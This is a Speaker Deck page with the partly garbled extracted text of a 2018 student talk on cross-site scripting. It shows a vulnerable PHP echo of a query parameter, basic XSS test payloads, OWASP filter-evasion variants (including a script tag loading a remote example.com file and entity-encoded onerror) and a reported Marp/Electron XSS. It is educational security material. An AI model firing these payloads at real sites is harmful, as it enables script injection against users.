Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
1.5k
2
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
OSINT for SRE: 学術論文とポストモーテムから探る システム障害の共通パターン / SRE NEXT 2026
tomoyk
1
1.1k
イベントとリソース定義から作成した依存グラフを用いた連鎖障害の調査時間の短縮 / DPS-206
tomoyk
0
24
Query Prediction for Log Search for Distributed Tracing with External Monitoring Alerts
tomoyk
0
42
Root Cause Analysis for Middleware Issues by Kubernetes Resource Events / KST-2026
tomoyk
0
84
Reading HTTP Client Hints
tomoyk
0
150
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
270
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
400
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
490
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
1
1.1k
Other Decks in Technology
See All in Technology
依頼文化をやめる日 EM視点で語るPlatform EngineeringとInclusive SRE / Discussing Platform Engineering and Inclusive SRE from an EM's Perspective
shin1988
4
2.8k
しぶいSRE: サーバから見えない障害にどう向き合うか。ラストワンマイルのデバッグ実践 / Shibui SRE
kanny
10
3k
Foxgloveについて 実際にExtensionを開発して公開するまでの話 / About Foxglove: The Story of Developing and Releasing an Extension
ry0_ka
0
160
“全部コピーしない”ファイルデータの活用 : — FSx for ONTAP × S3 Tables × Icebergで作るメタデータカタログ
yoshiki0705
0
500
4人目のSREはAgent
tanimuyk
0
400
FinOps X 2026 Recap from Engineer Side #JapanFinOps
chacco38
0
260
生成AIの活用/high_school2026
okana2ki
0
110
プライバシー保護の理論と実践
lycorptech_jp
PRO
1
240
打造你的 AI 工作流:Agent Skill + MCP 實戰工作坊
appleboy
0
670
なぜ私たちのSREプラクティスはなかなか機能しないのか 〜システムより先に組織を見る〜 / Why our SRE practices aren't really working
vtryo
1
1.3k
AI Driven AI Governance
pict3
0
140
GuardrailからGovernanceへ~AIエージェント運用の次の課題~
sbspsy
1
210
Featured
See All Featured
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
35
2.5k
StorybookのUI Testing Handbookを読んだ
zakiyama
31
6.8k
Getting science done with accelerated Python computing platforms
jacobtomlinson
2
250
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
28
3.5k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
25
2k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.8k
Avoiding the “Bad Training, Faster” Trap in the Age of AI
tmiket
0
190
Bridging the Design Gap: How Collaborative Modelling removes blockers to flow between stakeholders and teams @FastFlow conf
baasie
0
610
How to Grow Your eCommerce with AI & Automation
katarinadahlin
PRO
1
220
jQuery: Nuts, Bolts and Bling
dougneiner
66
8.5k
Utilizing Notion as your number one productivity tool
mfonobong
4
340
The Power of CSS Pseudo Elements
geoffreycrofte
82
6.3k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron